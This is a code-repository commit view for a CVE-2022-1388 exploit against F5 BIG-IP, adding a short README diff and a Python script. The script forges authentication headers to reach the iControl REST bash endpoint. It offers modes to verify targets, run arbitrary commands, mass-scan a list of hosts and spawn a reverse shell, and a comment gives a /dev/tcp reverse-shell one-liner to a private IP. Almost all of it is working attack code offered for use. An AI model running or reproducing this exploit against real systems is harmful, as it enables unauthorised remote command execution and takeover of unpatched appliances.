STRLCPY/CVE-2022-1388-EXP

add exp
```
add exp
```
Caps committed 2 years ago

702848b2

1 parent 14533ba4

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

README.md

1	1		# F5 BIG-IP RCE Check
2	2
3		-	Images：
	3	+	check：
4	4
5	5		![image-20220508193704635](https://s2.loli.net/2022/05/08/KFtNQ1JLP3MglTp.png)
6	6
	7	+	exp：
7	8
	9	+	![image-20220509171026129](https://s2.loli.net/2022/05/09/Ra8WQldj23JA95t.png)
8	10
9		-	CVE-2022-1388 F5 BIG-IP iControl Rest API exposed RCE Check
	11	+
	12	+
	13	+	注：exp是根据 [CVE-2021-22986](https://github.com/Al1ex/CVE-2021-22986) 更改！
10	14
11	15

■ ■ ■ ■ ■ ■

exp.py

1	+	#!/usr/bin/python3.9
2	+	# -- coding: utf-8 --
3	+	#
4	+	# Copyright (C) 2021 Caps, Inc. All Rights Reserved
5	+	#
6	+	# @Time : 2022/5/9 16:52
7	+	# @Author : Caps
8	+	# @Email : [email protected]
9	+	# @File : CVE-2022-1388.py
10	+	# @Software: PyCharm
11	+	import requests
12	+	import sys
13	+	import argparse
14	+	import json
15	+	import time
16	+	from requests.packages.urllib3.exceptions import InsecureRequestWarning
17	+
18	+	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
19	+
20	+	t = int(time.time())
21	+
22	+
23	+	def title():
24	+	print('''
25	+	_____ _ _ _____ _____ _____ _____ _____ __ _____ _____ _____
26	+	/ __ \\| \| \| \|\| ___\| / __ \\| _ \|/ __ \/ __ \ / \| \|____ \|\| _ \|\| _ \|
27	+	\| / \/\| \| \| \|\| \|__ ______`' / /'\| \|/' \|`' / /'`' / /'______`\| \| / / \ V / \ V /
28	+	\| \| \| \| \| \|\| __\|\|______\| / / \| /\| \| / / / / \|______\|\| \| \ \ / _ \ / _ \
29	+	\| \__/\\ \_/ /\| \|___ ./ /___\ \|_/ /./ /___./ /___ _\| \|_.___/ /\| \|_\| \|\| \|_\| \|
30	+	\____/ \___/ \____/ \_____/ \___/ \_____/\_____/ \___/\____/ \_____/\_____/
31	+	Author:[email protected]
32	+	Github:https://github.com/bytecaps
33	+	''')
34	+	print('''
35	+	验证模式：python CVE_2022_1388.py -v true -u target_url
36	+	攻击模式：python CVE_2022_1388.py -a true -u target_url -c command
37	+	批量检测：python CVE_2022_1388.py -s true -f file
38	+	反弹模式：python CVE_2022_1388.py -r true -u target_url -c command
39	+	''')
40	+
41	+
42	+	def headers():
43	+	headers = {
44	+	"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
45	+	'Content-Type': 'application/json',
46	+	'Connection': 'keep-alive, x-F5-Auth-Token',
47	+	'X-F5-Auth-Token': 'a',
48	+	'Authorization': 'Basic YWRtaW46'
49	+	}
50	+	return headers
51	+
52	+
53	+	def check(target_url):
54	+	check_url = target_url + '/mgmt/tm/util/bash'
55	+	data = {'command': "run", 'utilCmdArgs': "-c id"}
56	+	try:
57	+	response = requests.post(url=check_url, json=data, headers=headers(), verify=False, timeout=5)
58	+	if response.status_code == 200 and 'commandResult' in response.text:
59	+	print("[+] 目标 {} 存在漏洞".format(target_url))
60	+	else:
61	+	print("[-] 目标 {} 不存在漏洞".format(target_url))
62	+	except Exception as e:
63	+	print('url 访问异常 {0}'.format(target_url))
64	+
65	+
66	+	def attack(target_url, cmd):
67	+	attack_url = target_url + '/mgmt/tm/util/bash'
68	+	data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
69	+	try:
70	+	response = requests.post(url=attack_url, json=data, headers=headers(), verify=False, timeout=5)
71	+	if response.status_code == 200 and 'commandResult' in response.text:
72	+	default = json.loads(response.text)
73	+	display = default['commandResult']
74	+	print("[+] 目标 {} 存在漏洞".format(target_url))
75	+	print('[+] 响应为:{0}'.format(display))
76	+	else:
77	+	print("[-] 目标 {} 不存在漏洞".format(target_url))
78	+	except Exception as e:
79	+	print('url 访问异常 {0}'.format(target_url))
80	+
81	+
82	+	def reverse_shell(target_url, command):
83	+	reverse_url = target_url + '/mgmt/tm/util/bash'
84	+	data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(command)}
85	+	# command: bash -i >&/dev/tcp/192.168.174.129/8888 0>&1
86	+	try:
87	+	requests.post(url=reverse_url, json=data, headers=headers(), verify=False, timeout=5)
88	+	except Exception as e:
89	+	print("[+] 请自行查看是否反弹shell回来")
90	+
91	+
92	+	def scan(file):
93	+	for url_link in open(file, 'r', encoding='utf-8'):
94	+	if url_link.strip() != '':
95	+	url_path = format_url(url_link.strip())
96	+	check(url_path)
97	+
98	+
99	+	def format_url(url):
100	+	try:
101	+	if url[:4] != "http":
102	+	url = "https://" + url
103	+	url = url.strip()
104	+	return url
105	+	except Exception as e:
106	+	print('URL 错误 {0}'.format(url))
107	+
108	+
109	+	def main():
110	+	parser = argparse.ArgumentParser("F5 Big-IP RCE")
111	+	parser.add_argument('-v', '--verify', type=bool, help=' 验证模式 ')
112	+	parser.add_argument('-u', '--url', type=str, help=' 目标URL ')
113	+
114	+	parser.add_argument('-a', '--attack', type=bool, help=' 攻击模式 ')
115	+	parser.add_argument('-c', '--command', type=str, default="id", help=' 执行命令 ')
116	+
117	+	parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ')
118	+	parser.add_argument('-f', '--file', type=str, help=' 文件路径 ')
119	+
120	+	parser.add_argument('-r', '--shell', type=bool, help=' 反弹shell模式 ')
121	+	args = parser.parse_args()
122	+
123	+	verify_model = args.verify
124	+	url = args.url
125	+
126	+	attack_model = args.attack
127	+	command = args.command
128	+
129	+	scan_model = args.scan
130	+	file = args.file
131	+
132	+	shell_model = args.shell
133	+
134	+	if verify_model is True and url is not None:
135	+	check(url)
136	+	elif attack_model is True and url is not None and command is not None:
137	+	attack(url, command)
138	+	elif scan_model is True and file is not None:
139	+	scan(file)
140	+	elif shell_model is True and url is not None and command is not None:
141	+	reverse_shell(url, command)
142	+	else:
143	+	sys.exit(0)
144	+
145	+
146	+	if __name__ == '__main__':
147	+	title()
148	+	main()
149	+

add exp